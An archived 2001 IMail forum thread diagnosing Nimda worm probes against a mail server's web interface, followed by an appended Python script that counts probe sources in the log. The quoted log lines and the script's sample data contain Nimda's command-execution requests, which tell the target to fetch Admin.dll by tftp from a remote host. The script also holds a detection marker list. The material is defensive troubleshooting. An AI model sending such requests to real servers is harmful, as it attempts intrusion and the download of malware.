Scott and everyone else that replied, Thanks for your input. At least now I feel like I know exactly what's going on. We changed the port to Web Messaging which seems to be the only real solution for now. It still would be nice for Imail's web server to have the ability to filter these types of things like you can with IIS, but oh well... I've been working on this for 3 days straight now so it's good enough for me. Thanks to everyone,
Charles Short
[EMAIL PROTECTED]
Systems Administrator
Orotech Web Services
http://www.orotech.net
910.350.7980 voice
910.350.7976 fax

----- Original Message -----
From: "R. Scott Perry" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: "Charles Short" <[EMAIL PROTECTED]>
Sent: Friday, September 21, 2001 10:47 AM
Subject: Re: [IMail Forum] DoS Attack on IMail Web Messaging?? HELP!

> > We started seeing problems on Tuesday like everyone else, but we are
> > running IMail on a server by itself... No IIS. I am seeing a lot of
> > malformed header requests in the logs like the Code Red I & II virus does
> > to IIS servers ...
> >
> > 20010918 111401 208.180.242.21, , , GET
> > /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll
> > HTTP/1.0
>
> This is from the Nimda virus. Computers that get infected with it will
> connect to pseudo-random IPs, and if there is a web server on them, will
> try a dozen different IIS hacks. The fact that you are not running IIS
> doesn't make a difference; Nimda doesn't care about wasting bandwidth and
> other resources just because you aren't running IIS.
>
> > and -- this is the odd part -- some BRO*.tmp files in my spool directory
> > that are most definitely being caused by people browsing WebMail.
>
> That's normal. IMail will create those files for web requests, such as the
> ones that Nimda is making.
>
> > It is causing web messaging to crawl, but other than that I have not
> > seen what everyone else seems to be seeing with the Nimda virus. No other
> > characteristics of the Nimda virus at all. I honestly do not believe that
> > we have been infected...
>
> You are not infected, you are just being attacked by other servers that are
> infected.
>
> > 20010918 111401 208.180.242.21, , , GET
> > /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll
> > HTTP/1.0
> > 20010918 111401 208.234.121.72, , , GET
> > /MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll
> > HTTP/1.0
> > 20010918 111401 205.218.122.146, , , GET
> > /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20d:\Admin.dll
> > HTTP/1.0
>
> Note that these are all coming from different IP addresses. It's not
> because of a problem with your server.
>
> > When I called the other day the assumption was that it was the Nimda
> > virus and the Ipswitch support guys said to run a virus program and
> > reload the web template files to fix it and that has done nothing at all
> > to help.
>
> Ipswitch does seem to be pretty clueless about viruses (but, that's OK,
> since they aren't in the AV business). They don't seem to realize that few
> (if any) viruses try to break back into the same machine they are
> running on.
>
> > I even went ahead and made the upgrade from 6.06 to v.7.03 Wednesday
> > night and no progress.
>
> That won't do any good. That's like buying a new telephone to try to get
> rid of crank calls.
>
> > I have all of the virus definitions for Norton and I've done SEVERAL
> > system scans with Norton, House Call and the FIX_NIMDA.EXE program from
> > Trend Micro and all came up empty handed. I just can't believe that the
> > Nimda has gotten into our system...
>
> It hasn't. You're just getting hit from other servers.
>
> > Is anyone else seeing these BRO*.tmp files or is it just me?
>
> Yes, anyone running IMail's web server on port 80 will see a large increase
> in those files when Nimda-infected computers connect to theirs.
>
> > This seems to be a problem specific to IMail's Web Messaging program
> > not properly filtering out these malformed requests.
>
> No, it is simply sending the logon page that it is designed to return when
> a bad URL is given.
>
> > When Web Messaging is off, the server runs like a dream. It is one thing
> > to patch an IIS server with a patch from the product vendor, but I
> > honestly don't have a clue as to what else I can do to stop this DoS
> > attack from happening on my IMail box without implementing a firewall
> > system for that server.
>
> That's what you have to do. No software can prevent a DoS attack that is
> simply flooding the server with requests.
>
> -Scott
> ---
> Declude: Anti-virus, Anti-spam and Anti-hijacking solutions for
> IMail. http://www.declude.com
>
> An Archive of this list is available at:
> http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

The HKSI-IMail Admin List is hosted by Humankind Systems, Inc.
Message Archive: http://www.tallylist.com/archives/index.cfm/mlist.4
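Scott's diagnosis is that the log entries are probes from infected remote hosts, not a local infection. A defender's first check is to pull those probes out of the log and count them per source address; if the hits spread across many unrelated IPs, the box is being scanned rather than compromised. The following Python is an added example, not code from the thread or from Ipswitch: the log field layout is an assumption reconstructed from the lines quoted above, the request markers are the ones quoted there, and the sample lines use constructed RFC 5737 addresses.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumed IMail web log layout, reconstructed from the lines quoted above:
#   "<yyyymmdd> <hhmmss> <client-ip>, , , <METHOD> <url> HTTP/<ver>"
LOG_RE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{6}) (?P<ip>[\d.]+), , , "
    r"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/(?P<ver>\d\.\d)$"
)

# Markers taken from the requests quoted in the thread, matched against the
# decoded, lower-cased URL (root.exe, cmd.exe, the tftp pull of Admin.dll).
NIMDA_MARKERS = ("/root.exe", "/winnt/system32/cmd.exe", "tftp -i", "admin.dll")

# Constructed sample log: three probing hosts (one of them twice) plus one
# normal WebMail request. Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
20010918 111401 192.0.2.21, , , GET /scripts/root.exe?/c+tftp%20-i%20192.0.2.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 192.0.2.72, , , GET /MSADC/root.exe?/c+tftp%20-i%20192.0.2.89%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 198.51.100.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20198.51.100.146%20GET%20Admin.dll%20d:\\Admin.dll HTTP/1.0
20010918 111402 198.51.100.146, , , GET /MSADC/root.exe?/c+tftp%20-i%20198.51.100.146%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111405 203.0.113.5, , , GET /IMail/1234/home.htm HTTP/1.1
""".splitlines()


def parse_line(line):
    """Split one log line into its fields; None if it does not fit the layout."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_nimda_probe(url):
    """True when the decoded request URL carries one of the worm's markers."""
    decoded = unquote(url.replace("+", " ")).lower()
    return any(marker in decoded for marker in NIMDA_MARKERS)


def probes_by_source(lines):
    """Count probe requests per client IP; ordinary WebMail traffic is ignored."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and is_nimda_probe(rec["url"]):
            hits[rec["ip"]] += 1
    return hits


if __name__ == "__main__":
    # Many distinct sources, as Scott notes, means remote infected hosts
    # scanning you, not a problem on the IMail box itself.
    for ip, n in probes_by_source(SAMPLE_LOG).most_common():
        print(f"{ip}: {n} probe(s)")
```

Running it over the real IMail log instead of SAMPLE_LOG gives the list of source addresses a perimeter filter would need to drop, which is the firewall step Scott recommends.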
